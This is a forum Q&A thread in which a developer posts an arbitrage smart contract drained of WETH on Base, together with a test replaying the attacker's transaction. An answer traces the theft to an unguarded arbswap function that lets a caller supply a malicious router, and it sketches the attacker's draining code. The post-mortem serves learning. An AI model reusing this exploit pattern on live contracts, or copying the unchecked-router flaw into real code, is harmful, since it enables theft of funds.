Contract got hacked, what's wrong with it?
My Contract got hacked, and I cannot figure out why.
Happened on Base. Hacker deployed a contract, then called their contract, which called my contract, and extracted tokens from my contract. But contract only allows whitelisted addresses to extract tokens from the contract.
Edit: The only whitelisted address was my own wallet, and a supporting contract I deployed which only contained view functions, the "quoter".
My Contract:
// SPDX-License-Identifier: ISC
pragma solidity ^0.8.17;

import "lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol"; // v4.9.3
import "lib/openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol";

import "interfaces/IUniswapV2.sol";
import "interfaces/IUniswapV2Pair.sol";
import "interfaces/IEliteSwapRouter.sol";
import "interfaces/IEqualizerRouter.sol";
import "interfaces/IBeethovenXVault.sol";
import "interfaces/ICurvePool.sol";
import "interfaces/IArbiTricrypto.sol";
import "interfaces/IMummyVault.sol";
import "interfaces/IUniswapV3.sol";
import "interfaces/IAtlas.sol";


contract Atlas {
    using SafeERC20 for IERC20;

    event log_uint(uint);
    event log_address(address);

    mapping(address => bool) private whitelist;

    constructor(
        address quoter
    ) {
        whitelist[msg.sender] = true;
        if (quoter != address(0)) {
            whitelist[quoter] = true;
        }
    }


    // ******** //
    // Swappers //
    // ******** //

    // 3 fee pool tiers in v3: 500, 3000, 10000
    function univ3Swap(address router, address tokenIn, address tokenOut, uint24 fee, uint amt) private returns (uint) {
        IERC20(tokenIn).approve(router, amt);

        IUniswapV3.ExactInputSingleParams memory params; 
        params.tokenIn = tokenIn;
        params.tokenOut = tokenOut;
        params.fee = fee;
        params.recipient = address(this);
        params.amountIn = amt;
        params.amountOutMinimum = 0;
        params.sqrtPriceLimitX96 = 0;

        return IUniswapV3(router).exactInputSingle(params);
    }

    function mummySwap(address vault, address tokenIn, address tokenOut, uint amt) private returns (uint) {
        IERC20(tokenIn).transfer(vault, amt);
        uint amtOut = IMummyVault(vault).swap(tokenIn, tokenOut, address(this));
        return amtOut;
    }

    // Works with Curve 2/3Pools
    function curveSwap(address pool, address tokenIn, address tokenOut, int128 i, int128 j, uint amt) private returns (uint) {
        IERC20(tokenIn).safeApprove(pool, amt);

        uint amtOut;
        if (pool == 0x3a1659Ddcf2339Be3aeA159cA010979FB49155FF) { // Curve Tricrypto FTM
            amtOut = ICurvePool(pool).exchange(uint(int256(i)), uint(int256(j)), amt, 0); // Tricrypto Pools
        } else if (pool == 0x960ea3e3C7FB317332d990873d354E18d7645590) { // Curve Tricrypto Arbi
            uint amtTokenBefore = IERC20(tokenOut).balanceOf(address(this));
            IArbiTricrypto(pool).exchange(uint(int256(i)), uint(int256(j)), amt, 0);
            amtOut = IERC20(tokenOut).balanceOf(address(this)) - amtTokenBefore;
        } else {        
            amtOut = ICurvePool(pool).exchange(i, j, amt, 0); // Standard Curve Pools
        }
        
        return amtOut;
    }

    // Equalizer Router
    // Note: only the DAI USDC pool is stable
    function equalizerSwap(address router, address tokenIn, address tokenOut, bool stable, uint amountIn) private returns (uint) {
        IERC20(tokenIn).safeApprove(router, amountIn);

        uint deadline = block.timestamp + 300;
        uint[] memory amts = IEqualizerRouter(router).swapExactTokensForTokensSimple(amountIn, 1, tokenIn, tokenOut, stable, address(this), deadline);
        return amts[amts.length-1];
    }

    // UniV2
    function uniV2Swap(address router, address tokenIn, address tokenOut, uint256 amt) private returns (uint) {
        IERC20(tokenIn).safeApprove(router, amt);

        address[] memory path;
        path = new address[](2);
        path[0] = tokenIn;
        path[1] = tokenOut;
        uint deadline = block.timestamp + 300;

                                                                           // AmtOutMin
        uint[] memory amtsOut = IUniswapV2(router).swapExactTokensForTokens(amt, 1, path, address(this), deadline);
        return amtsOut[amtsOut.length-1];
    }

    // Eliteness
    function eliteSwap(address router, address tokenIn, address tokenOut, uint256 amt, uint256 pairBinPid) private returns (uint) {
        IERC20(tokenIn).safeApprove(router, amt);
        IEliteSwapRouter.Path memory path = _buildPath(IERC20(tokenIn), IERC20(tokenOut), pairBinPid); 
        
        uint deadline = block.timestamp + 300;
                                                                            // AmtOutMin
        uint amtOut = IEliteSwapRouter(router).swapExactTokensForTokens(amt, 1, path, address(this), deadline);
        return amtOut;
    } 


    // ********************
    // Swap Main Functions 
    // external caller for multiswap
    function multiswap(IAtlas.SwapData calldata swapdata) external returns (uint) {
        require (whitelist[msg.sender] == true, "uauth");
        return multiswapInternal(swapdata);
    }

    // RouterType: 0 = Univ2 | 1 = Elite | 2 = Equalizer | 3 = Curve | 4 = Mummy | 5 = univ3
    // Equalizer: FTM - USDC PID 20 | USDT - USDC PID 1
    function multiswapInternal(IAtlas.SwapData calldata swapdata) private returns (uint) {
        require(swapdata.routers.length == swapdata.tokensIn.length, "Invalid Input");
        require(swapdata.tokensIn.length == swapdata.tokensOut.length, "Invalid Input");

        uint tAmount = swapdata.amt;
        for (uint i = 0; i < swapdata.routers.length; i++) {

            if (swapdata.routerType[i] == 0) {
                tAmount = uniV2Swap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], tAmount);
            } else if (swapdata.routerType[i] == 1) {
                tAmount = eliteSwap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], tAmount, swapdata.pairBinId[i]);
            } else if (swapdata.routerType[i] == 2) {
                tAmount = equalizerSwap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], false, tAmount);     // Note: only the DAI USDC pool is stable
            } else if (swapdata.routerType[i] == 3) {
                tAmount = curveSwap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], swapdata.curvei[i], swapdata.curvej[i], tAmount); // routers[i] here is the curve pool
            } else if (swapdata.routerType[i] == 4) {
                tAmount = mummySwap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], tAmount); 
            } else if (swapdata.routerType[i] == 5) {
                tAmount = univ3Swap(swapdata.routers[i], swapdata.tokensIn[i], swapdata.tokensOut[i], 500, tAmount); // leave the fee at 500 pools for now @todo
            }
        }

        return tAmount; 
    }

    function arbswap(IAtlas.SwapData calldata swapdata) external returns (uint) {
        //require (whitelist[msg.sender] == true, "uauth");
        require (swapdata.tokensIn[0] == swapdata.tokensOut[swapdata.tokensOut.length-1], "Incomplete Path");
        
        uint amtOut = multiswapInternal(swapdata);
        require (amtOut > swapdata.amt, "Failed: NP");
        return amtOut;
    }


    // ***** //
    // Views //
    // ***** //

    /*
    function queryBeethovenX(address vault) public view returns (uint) {

    } */ 


    function equalizerAmountsOut(address router, address tokenIn, address tokenOut, uint amount) public view returns (uint) {
        (uint amtOut, ) = IEqualizerRouter(router).getAmountOut(amount, tokenIn, tokenOut);
        return amtOut;
    }

    function eliteAmountsOut(address router, address pool, uint128 amountIn, bool swapForY) public view returns (uint) {
        (, uint amtOut, ) = IEliteSwapRouter(router).getSwapOut(pool, amountIn, swapForY);
        return amtOut;
    }

    function uniV2AmountsOut(address router, address tokenIn, address tokenOut, uint256 amt) public view returns (uint) {
        address[] memory path;
        path = new address[](2);
        path[0] = tokenIn;
        path[1] = tokenOut;
        uint[] memory amtsOut = IUniswapV2(router).getAmountsOut(amt, path);
        return amtsOut[amtsOut.length-1];
    }


    // ********************** //
    //  Supporting Functions  //
    // ********************** //

    function recoverEth() external {
        require (whitelist[msg.sender] = true, "uauth");
        payable(msg.sender).transfer(address(this).balance);
    }

    function recoverTokens(address token, uint amount) external {
        require (whitelist[msg.sender] == true, "uauth");
        if (amount == 0) {
            IERC20(token).transfer(msg.sender, IERC20(token).balanceOf(address(this)));
        } else {
            IERC20(token).transfer(msg.sender, amount);
        }
    }

    function getBalance(address token) external view returns (uint) {
        return IERC20(token).balanceOf(address(this));
    }

    function addWhitelist(address allow) external {
        require (whitelist[msg.sender] == true, "uauth");
        whitelist[allow] = true;
    }

    function removeWhitelist(address remove) external {
        require (whitelist[msg.sender] == true, "uauth");
        whitelist[remove] = false;
    }


    // For Elite Router
    function _buildPath(IERC20 tokenIn, IERC20 tokenOut, uint pairBinPid) private pure returns (IEliteSwapRouter.Path memory path) {
        path.pairBinSteps = new uint256[](1);
        path.pairBinSteps[0] = pairBinPid;

        path.versions = new IEliteSwapRouter.Version[](1);
        path.versions[0] = IEliteSwapRouter.Version.V2_1;

        path.tokenPath = new IERC20[](2);
        path.tokenPath[0] = tokenIn;
        path.tokenPath[1] = tokenOut;
    }

}


interface IAtlas {

    struct SwapData {
        address[] routers;
        uint[]    routerType;
        uint[]    pairBinId;
        address[] tokensIn;
        address[] tokensOut;
        int128[]  curvei;
        int128[]  curvej;
        uint      amt;
    }

    function arbswap(SwapData calldata swapdata) external returns (uint);
    
}


The contract had 0.22 WETH in it.
Hacker's actions:

Deploy contract https://basescan.org/tx/0x5dbd5df4e8f2e2267a6386ddcad1d02a475d2b8b22ad3eee9606c919904f312e
Call hacker contract, which drained the weth in my contract to the hacker wallet https://basescan.org/tx/0x75fe3447f11eb9611e226858181c18f4a57f546ac8f0ecbd6d50d82b5adc2d43

I attempted to replicate these transactions in forge forking the blockchain just after the hacker contract creation, but my replica hacker contract transactions all reverted. I copied the tx input data bytecode exactly.
    function test_hack() public {
        address hackerwallet = 0x0a64eABc8f5049a0BDE336F79ec9087B98658B9C;
        address hackercontract = 0x6d5E11a3810f88177Be46586b7cBd07229C61908;
        vm.startPrank(hackerwallet);
        // pack raw bytes into a transaction input (hacker calldata)
        bytes memory data = hex"f2afdff30000000000000000000000008cb5722179de0860b0bce7564b28523bba902d5c000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004200000000000000000000000000000000000006000000000000000000000000484e9ab40b76826480bfe9d6455a135654401335";
        hackercontract.call(data);

        // destroy method
        //bytes memory des = hex"83197ef0";
        //hackercontract.call(des);

        vm.stopPrank();
    }


Result:
    ├─ [2971] 0x6d5E11a3810f88177Be46586b7cBd07229C61908::f2afdff3(0000000000000000000000008cb5722179de0860b0bce7564b28523bba902d5c000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004200000000000000000000000000000000000006000000000000000000000000484e9ab40b76826480bfe9d6455a135654401335)
    │   └─ ← [Revert] EvmError: Revert


I couldn't even get the destroy method to work, pranking as the hacker wallet (they later destroyed their hacking contract).
So couple of questions here:

Is there a very obvious exploit in my contract?
Why wouldn't replicating the hacker transaction on a fork of the blockchain at the time result in a success?



    function arbswap(IAtlas.SwapData calldata swapdata) external returns (uint) {
        //require (whitelist[msg.sender] == true, "uauth");
        require (swapdata.tokensIn[0] == swapdata.tokensOut[swapdata.tokensOut.length-1], "Incomplete Path");
        
        uint amtOut = multiswapInternal(swapdata);
        require (amtOut > swapdata.amt, "Failed: NP");
        return amtOut;
    }

Scammers smart contract calls arbswap() function with his own parameters which looks like this .
{
routerType: 1,
routers: [Scammers_Own_Calling_Smart_contract], 

tokensIn: [WETH_Address]

tokensOut: [WETH_Address] 

tAmount: 115792089237316195423570985008687907853269984665640564039457584007913129639934

}

 require (swapdata.tokensIn[0] == swapdata.tokensOut[swapdata.tokensOut.length-1], "Incomplete Path");


passes as swapdata.tokensIn[0] and  swapdata.tokensOut[swapdata.tokensOut.length-1] both equate to WETH_Address. (Note that the whiteList check is commented out)
Your multiswapInternal() in turn calls uniV2Swap()
In uniV2Swap(), first your contract gives permission for the scam contract to spend your contracts WETH in the line below.
IERC20(WETH_Address).safeApprove(Scammers_Own_Calling_Smart_contract, 115792089237316195423570985008687907853269984665640564039457584007913129639934);

At last,
uint[] memory amtsOut = IUniswapV2(Scammers_Own_Calling_Smart_contract).swapExactTokensForTokens(amt, 1, path, address(this), deadline);

The line above in uniV2Swap() calls scammers own contract address instead of uniswaps . The scammers contract must have a line like this -
function swapExactTokensForTokens(
       uint256 amt,
       uint256 someVar,
       address[2] memory _somePath,
       address _someAddress,
       uint256 _someDeadline
   ) public {
       IWETH(WETH_Address).transferFrom(
           0x8CB5722179DE0860b0BcE7564b28523bba902D5c, //Your contract address
           0x0a64eABc8f5049a0BDE336F79ec9087B98658B9C, // Scammers own address
           210427141639847852 // The amount to transfer
       );
   }

The scammer called a transferFrom() on WETH token from his scam contract . Since the tokens were approved it went through and he collected the WETH at address 0x0a64eABc8f5049a0BDE336F79ec9087B98658B9C
In short -

Since there were no effective input checks to arbswap(), the scammer crafted his input parameters. The scammer approved your contracts WETH to be spent by his contract
Because of no input checks the scammer's contract was called instead of uniswaps. Since the WETH was already approved, the scammer simply transferred the WETH to his account.

Note: routerType:2 which triggers equalizerSwap() also could have been used. The logic of the attack remains exactly the same with equalizerSwap(). I have not checked for routerType > 2.
EDIT : The OP added more to the contract and also says he has not added addresses to whitelist other than his and a contract only consisting of views .

The only whitelisted address was my own wallet, and a supporting contract I deployed which only contained view functions.

@0xQuasar Post the entire smart contract and not just the abridged version .

ok I posted the full version

@0xQuasar Check my edited answer

Yes this is genius, I think you have solved a way of hacking it. I am surprised the hacker would have gotten the struct input correct since the contract was not verified. Are you a Solidity engineer?

@0xQuasar Yes. I am a solidty and web3 developer .

Let us continue this discussion in chat.
